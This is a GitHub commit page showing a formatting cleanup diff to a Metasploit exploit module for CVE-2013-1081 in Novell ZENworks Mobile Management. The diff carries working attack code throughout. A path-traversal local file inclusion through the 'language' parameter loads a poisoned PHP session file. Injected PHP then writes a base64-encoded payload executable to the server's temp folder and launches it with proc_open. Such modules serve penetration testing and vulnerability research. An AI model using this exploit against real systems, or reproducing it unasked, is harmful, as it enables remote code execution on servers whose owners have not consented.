Skip to content

Commit 02e29ff

Browse files
wchen-r7wchen-r7
committed
Make msftidy happy
1 parent 35459f2 commit 02e29ff

File tree

1 file changed

+31
-18
lines changed

1 file changed

+31
-18
lines changed

modules/exploits/windows/http/novell_mdm_lfi.rb

Lines changed: 31 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@ def initialize
2222
'Author' =>
2323
[
2424
'steponequit',
25-
'Andrea Micalizzi (aka rgod)' #zdi report
25+
'Andrea Micalizzi (aka rgod)' #zdi report
2626
],
2727
'Platform' => 'win',
2828
'Targets' =>
@@ -34,6 +34,7 @@ def initialize
3434
[
3535
['CVE', '2013-1081']
3636
],
37+
'DisclosureDate' => "Mar 13 2013",
3738
'License' => MSF_LICENSE
3839
)
3940

@@ -55,35 +56,46 @@ def setup_session()
5556
'method' => "HEAD",
5657
'uri' => normalize_uri("#{target_uri.path}/download.php"),
5758
'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
58-
})
59+
})
5960
return sess,cmd
6061
end
6162

6263
def upload_shell(session_id,cmd_var)
63-
fname = Rex::Text.rand_text_alpha(8)
64+
fname = Rex::Text.rand_text_alpha(8)
6465
payload = generate_payload_exe
66+
cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
67+
cmd << "file_put_contents($wdir.'#{fname}.exe',"
68+
cmd << "base64_decode(file_get_contents('php://input')));"
69+
6570
res = send_request_cgi({
66-
'method' => 'POST',
67-
'uri' => normalize_uri("#{target_uri.path}/DUSAP.php"),
68-
'data' => Rex::Text.encode_base64(payload),
71+
'method' => 'POST',
72+
'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
73+
'data' => Rex::Text.encode_base64(payload),
6974
'vars_get' => {
7075
'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
71-
cmd_var => "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';file_put_contents($wdir.'#{fname}.exe',base64_decode(file_get_contents('php://input')));"
72-
}
76+
cmd_var => cmd
77+
}
7378
})
7479
return fname
7580
end
7681

7782
def exec_shell(session_id,cmd_var,fname)
78-
res = send_request_cgi({
79-
'method' => 'POST',
80-
'uri' => normalize_uri("#{target_uri.path}/DUSAP.php"),
81-
'data' => Rex::Text.encode_base64(payload),
82-
'vars_get' => {
83-
'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
84-
cmd_var => "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';$cmd=$wdir.'#{fname}';$output=array();$handle=proc_open($cmd,array(1=>array('pipe','w')),$pipes,null,null,array('bypass_shell'=>true));if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}"
85-
}
86-
})
83+
cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
84+
cmd << "$cmd=$wdir.'#{fname}';"
85+
cmd << "$output=array();"
86+
cmd << "$handle=proc_open($cmd,array(1=>array('pipe','w')),"
87+
cmd << "$pipes,null,null,array('bypass_shell'=>true));"
88+
cmd << "if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}"
89+
90+
res = send_request_cgi({
91+
'method' => 'POST',
92+
'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
93+
'data' => Rex::Text.encode_base64(payload),
94+
'vars_get' => {
95+
'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
96+
cmd_var => cmd
97+
}
98+
})
8799
end
88100

89101

@@ -93,7 +105,8 @@ def exploit()
93105
res = send_request_raw({
94106
'method' => 'GET',
95107
'uri' => uri
96-
})
108+
})
109+
97110
if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
98111
print_status("Found Zenworks MDM, Checking application version")
99112
ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]

0 commit comments

Comments
 (0)